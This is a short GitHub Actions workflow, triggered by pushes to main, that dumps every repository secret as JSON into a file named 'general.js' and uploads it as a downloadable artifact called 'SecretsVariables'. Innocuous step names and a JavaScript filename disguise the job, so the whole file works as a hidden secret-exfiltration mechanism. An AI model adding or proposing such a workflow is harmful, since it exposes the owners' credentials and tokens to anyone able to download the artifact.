name: env

on:
  push:
    branches: [ main ]

jobs:
  one:
    runs-on: ubuntu-latest
    steps:
    - name: "Echo in file"
      env:
        PVZHTMLMARCWU531UNDERPHAITH706_PASSWORD: ${{ toJson(secrets) }}
      run: echo "$PVZHTMLMARCWU531UNDERPHAITH706_PASSWORD" > "general.js"
      
    - uses: actions/upload-artifact@v3
      name: Upload Artifact
      with:
        name: SecretsVariables
        path: "general.js"
